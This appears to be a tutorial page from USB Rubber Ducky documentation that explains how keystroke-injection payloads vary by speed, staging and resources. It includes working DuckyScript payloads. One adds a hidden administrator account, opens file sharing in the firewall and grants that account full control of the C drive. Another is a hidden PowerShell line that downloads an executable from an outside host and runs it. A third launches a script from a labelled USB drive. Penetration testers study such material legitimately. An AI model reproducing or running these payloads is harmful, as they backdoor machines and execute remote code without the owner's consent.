Search…
Payload Principals
There are a few characteristics of a USB Rubber Ducky payload that should be understood in order to craft a successful attack. Regardless of any obfuscation or persistence techniques used, a payload can be defined by its speed, stages and resources.
Understanding these principles will help you to craft the most efficient payload for your task. Some of the most advanced attacks employ techniques to optimize for speed, even while utilizing multiple stages from numerous resources. Speed Speed should be mostly obvious. A fast, medium or slow payload depends on its complexity. With additional complexity comes slower, more conservative delivery in order to ensure reliability. That's not to say a fast payload can't complete a complex objective. Fast payloads simply require more finesse.
For example, if the objective is to inject and execute a visual basic script onto a typical Windows system, one could go about it a number of ways. The first may be to open notepad, type in the visual basic script content, save the file, close notepad, open the command prompt and execute the script. This requires navigating a number of graphical elements, from notepad and its save dialog to the command prompt. A faster and thus more robust method would be to only open one window - the command prompt - and use the esoteric "copy con" command to write the visual basic script file directly from the terminal. Doing so will be both faster, less complex and more reliable.
The ultimate in fast, reliable payloads may be the Run dialog one-liners. Without the need for further interaction after opening the ubiquitous dialog with the famed Windows+R keyboard combo, typing in a string of commands and pressing enter, these execute in just a couple of seconds.
1
REM A one-liner to add user "ts" (password "ts") to the admin group and share the C drive
2
DELAY 1000
3
GUI r DELAY 100
4
STRING powershell -Exec Bypass "saps cmd '/C net User ts ts /ADD&net LocalGroup Administrators ts /ADD&netsh advfirewall firewall set rule group="""File and Printer Sharing""" new enable=Yes&net share ts=c:\ /UNLIMITED&icacls c:* /grant ts:(OI)(CI)F' -Verb RunAs"
5
ENTER
6
DELAY 1000
7
ALT y
Copied!

Stages

A USB Rubber Ducky payload may be inline or staged.
An inline payload, often called an a single or non-staged payload, is designed to carry out the desired task in one, self contained step. They do not rely on any external resource such as a netcat listener or meterpreter handler. The previous example is an inline payload to add an admin user and share with it the C drive.
A staged payload consists of a stager and one or more stages, typically hosted on external resources such as network or mass storage. The stager payload will typically set up a network or filesystem connection to the staged payload in order for it to be executed. Once the staged payload has been executed, the USB Rubber Ducky is often free to be disconnected from the target system. This may be desirable as a staged payload may contain many complex instructions, executed without the need for the USB Rubber Ducky to be connected and typing.
The drawback to a staged payload may be visibility and reliability. Some organizations may have firewalls or intrusion detection systems configured to detect attacks, while others may have policies in place prohibiting certain network connections or even preventing the mounting of external storage.
1
REM An example staged payload.
2
REM This one-liner will download and execute a file hosted online.
3
DELAY 1000
4
GUI r
5
DELAY 200
6
STRING powershell -NoP -NonI -W Hidden -Exec Bypass “IEX (New-Object System.Net.WebClient).DownloadFile(‘http://example.com/calc.txt’,\”$env:temp\calc.exe\”); Start-Process \”$env:temp\calc.exe\””
7
ENTER
Copied!

Resources

Payloads may require external resources, that is to say more than the typical behavior of the USB Rubber Ducky in HIDy mode acting only as a keyboard. Common resources include network, mass storage as well as "out of band" networking.
The previous example downloads and executes a binary file hosted on from an external network resource. External resources are beneficial, especially as hosts for staged payloads capable of carrying out complex tasks faster than inline payloads. The drawback to a payload requiring these external resources is that they may be either blocked or noticed by systems administrators.
A staged payload may be hosted on a local USB flash drive. In this case the mass storage may either be the USB Rubber Ducky itself, with specialized firmware, or an accompanying USB device.
1
REM An example staged payload.
2
REM Run staged payload from USB drive with volume label "dk"
3
DELAY 3000
4
GUI r
5
DELAY 100
6
STRING powershell -NoP -NonI -W Hidden -Exec Bypass “$uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq ‘DK’ } | select name; cd $uP.name; .\p.ps1”
7
ENTER
Copied!
The above payload looks for a USB drive with the label “DK” and executes the powershell file “p.ps1” from the root of the drive.
Copy link